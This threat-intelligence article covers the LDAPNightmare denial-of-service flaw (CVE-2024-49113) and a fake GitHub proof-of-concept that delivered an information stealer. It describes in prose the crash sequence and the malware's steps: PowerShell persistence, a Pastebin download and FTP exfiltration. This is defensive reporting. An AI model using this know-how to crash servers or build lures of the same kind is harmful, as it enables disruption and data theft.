2025-01-16

Threat Actors Capitalize on CVE-2024-49113 with Fraudulent Proof-of-Concept Exploit

Level: 
Tactical
  |  Source: 
SafeBreach & Trend Micro
Global
Share:

Threat Actors Capitalize on CVE-2024-49113 with Fraudulent Proof-of-Concept Exploit

Capitalizing on interest in newly disclosed vulnerabilities, threat actors have released a fictitious proof-of-concept (PoC) for CVE-2024-49113 (aka LDAPNightmare), a Denial of Service (DoS) vulnerability affecting Windows Lightweight Directory Access Protocol (LDAP) services. This vulnerability was first detailed in a SafeBreach report published on January 1, 2025, which included a legitimate PoC exploit demonstrating how unpatched Windows servers could be crashed. Adversaries exploited the interest in this issue by introducing a malicious repository on GitHub, disguising information-stealing malware as a fake PoC for CVE-2024-49113. Microsoft addressed this vulnerability in the December 2024 Patch Tuesday update, and organizations are urged to apply the patch promptly. A second, more critical vulnerability, CVE-2024-49112, involving remote code execution (RCE), was also addressed; however, no PoC has been publicly disclosed for CVE-2024-49112. The pair of LDAP vulnerabilities was disclosed by Yuki Chen (@guhe120) on December 10, 2024, as part of the Patch Tuesday update.

Specifics regarding the CVE-2024-49113 vulnerability, as documented by SafeBreach researchers Or Yair and Shahak Morag, show that it enables remote attackers to crash Windows servers via specially crafted LDAP requests. The exploit involves an attacker-controlled server responding to LDAP queries with manipulated responses, resulting in memory access violations within the Lightweight Directory Access Protocol Daemon (LSASS) on unpatched Windows servers. The attack flow begins with the attacker sending an RPC request to a domain controller (DC), causing it to query a malicious LDAP server. The LDAP server responds with a crafted referral response, triggering out-of-bounds memory access and crashing the LSASS process, forcing the system to reboot. SafeBreach demonstrated that this vulnerability can be exploited on any unpatched Windows server with LDAP functionality enabled.

Trend Micro's analysis provided additional insights into the fake PoC, which was designed to lure researchers. According to Trend Micro Threat Hunter Sarah Pearl Camiling, the repository mimicked an authentic Python-based project but contained a suspicious executable file. "Although the repository is seemingly normal at first glance, the presence of the executable raises suspicion due to its unexpected presence in a Python-based project," said Camiling. The malicious repository included an executable file, "poc.exe," replacing the expected Python scripts. When executed, the file triggered a PowerShell script dropped into the "%Temp%" directory. This script established persistence by creating a scheduled job that initiated further activity with PowerShell commands. These commands downloaded a script from Pastebin, which collected system information—including process lists, network configurations, and directory contents—and compressed the data into a ZIP archive. Using hardcoded credentials, the ZIP file was exfiltrated to an external FTP server.

The exploitation of CVE-2024-49113 demonstrates the dual threats posed by legitimate vulnerabilities and malicious actors who exploit them for their campaigns. SafeBreach's PoC highlights the significant risks associated with LDAPNightmare and its potential to disrupt critical services. Meanwhile, Trend Micro’s analysis of the fake PoC emphasizes the importance of vigilance when using community-shared security tools to avoid falling victim to misleading repositories.

Get trending threats published weekly by the Anvilogic team.

Sign Up Now